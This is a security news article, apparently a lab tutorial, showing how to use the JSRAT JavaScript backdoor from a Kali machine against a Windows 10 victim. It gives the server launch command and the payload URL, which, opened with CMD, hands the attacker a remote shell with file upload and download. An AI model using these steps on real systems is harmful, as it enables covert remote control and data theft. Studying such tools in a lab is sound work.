Tuesday, November 12, 2024
HomeBackdoorJSRAT - Secret Command & Control Channel Backdoor to Control Victims Machine...

JSRAT – Secret Command & Control Channel Backdoor to Control Victims Machine Using JavaScript

Published on

Malware protection

JsRat is python based script developed to backdoor victim machine using JavaScript payloads and the HTTP protocol for communication between the server and the target hosts.

Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)

Installation & Setup :-

  • Download the JSRAT tool Here
  • Download and give appropriate permission to execute the script.Above figure shows the complete installation

Starting the web server:

  • Run and execute the command: python JSRAT.py -i <kali Linux or Attacker Ip> -p 8080
  • JSRAT provides the list of URLs.Copy the Client command here it is http://192.168.172.143:8080/wtf

VICTIM MACHINE:-

  • Open this Client command URL with Victim browser
  • To gain the shell payload generated by URL should be opened with CMD.
  • Once the command is executed a shell will be obtained.

BACK TO ATTACKERS MACHINE WITH BACKDOOR:-

  • Here we go !!! We have connected with the Victim machine
  • Let us try some windows command: Ipconfig
JSRAT
  • The above Figure shows executing the command calc opens up the Windows calculator.JSRat can also provide upload, Read and Download files. Happy Hacking !!!

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep your self-updated.

Latest articles

10 Best DNS Management Tools – 2025

Best DNS Management Tools play a crucial role in efficiently managing domain names and...

Sweet Security Announces Availability of its Cloud Native Detection & Response Platform on the AWS Marketplace

Customers can now easily integrate Sweet’s runtime detection and response platform into their AWS...

Researchers Detailed Credential Abuse Cycle

Cybercriminals exploit leaked credentials, obtained through various means, to compromise systems and data, enabling...

New Android Malware SpyAgent Taking Screenshots Of User’s Devices

SpyAgent, a newly discovered Android malware, leverages OCR technology to extract cryptocurrency recovery phrases...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

Embargo Ransomware Actors Abuses Safe Mode To Disable Security Solutions

In July 2024, the ransomware group Embargo targeted US companies using the malicious loader...

SMB Force-Authentication Vulnerability Impacts All OPA Versions For Windows

Open Policy Agent (OPA) recently patched a critical vulnerability that could have exposed NTLM...

New AI Tool To Discover 0-Days At Large Scale With A Click Of A Button

Vulnhuntr, a static code analyzer using large language models (LLMs), discovered over a dozen...